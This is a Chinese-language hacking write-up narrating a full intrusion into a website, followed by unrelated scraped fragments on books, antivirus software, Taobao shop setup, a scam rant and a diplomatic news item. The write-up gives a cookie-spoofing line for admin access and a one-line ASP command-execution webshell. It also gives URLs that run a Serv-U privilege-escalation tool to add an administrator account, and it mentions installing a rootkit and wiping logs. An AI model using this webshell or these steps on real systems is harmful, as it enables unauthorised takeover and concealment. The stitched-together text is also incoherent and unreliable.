DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的) 后台没什么功能,想放弃,可发现了下面的一幕 发现了一个计数器程序的readme http://www.abc.com/count/readme.txt 有说明就好办,从网上下了个源程序来 发现漏洞文件count/admin.asp代码如下 _____________________________________________________________ <% '****************************** ' ' 飞越访客单用户统计系统 ' 飞越 feiyueziwo@sohu.com ' www.pwsite.net ' ' 版权所有: 动力在线 ' '****************************** %> <% response.write Request.Cookies(feiyue)("Username") if Request.Cookies(feiyue)("Username")="" then response.end response.Redirect("login.asp?action=error") end if%> ........... _____________________________________________________________ cookies欺骗一句话就可以搞定 再IE里输入以下代码,再访问http://www.abc.com/count/admin.asp就是管理员了 javascript:document.cookie="feiyue=Username=cooldiyer"; 后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行, 后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到 SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell 主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe 写了一句话木马如下: <%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%> 执行: http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add" http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add" 成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......
1、这9本都与我一些关联或缘份,也就是我最少过去了一遍的,尽管并没都细心反复推敲,可是这种书,我还是迫不得已点个赞。 2、在其中一本是我与 xisigr 写的:-)我并不感觉在这里不可以强烈推荐,由于...
本文导读目录: 1、程序员 用什么杀毒杀毒软件好? 2、作为程序员的你,常用的工具软件有哪些? 3、什么是黑客?就是程序员的那种 4、黑客与普通程序员有什么不同 5、关于黑客 6、...
本文导读目录: 1、黑客攻击防御工具有哪些? 2、多次遇到黑客攻击,有什么有效的防护产品?要自己亲身体验过的那种。 3、用什么防火墙最好,可以防止木马或黑客攻击????? 4、急........
浏览器打开,进到淘宝网网页页面,点一下左上方的亲,请登陆,登陆淘宝帐号,挑选右上角的千牛卖家管理中心,注册网店,系统软件会跳转到千牛卖家操作台,设定一个店铺名字,开展支付宝实名验证,依据网页页面填好本...
妈勒戈壁,大骗子,叫吴迪,卧槽是个狗人 现在网络上的黑客骗子太多了。水很深。想要找正真的黑客去那些黑客网站上找比如域外黑客联盟或者网络攻防小组这类的。 黑客电话110,因为他们都被捉到监狱了。 怎么联...
中新网10月7日电 据中国驻日本使馆网站消息,7日,驻日本使馆发言人就美日印澳四国外长会及美国国务卿接受日媒采访答记者问。发言人表示,蓬佩奥屡次编造涉华谎言,恶意制造政治对抗;其图谋不得人心,更不...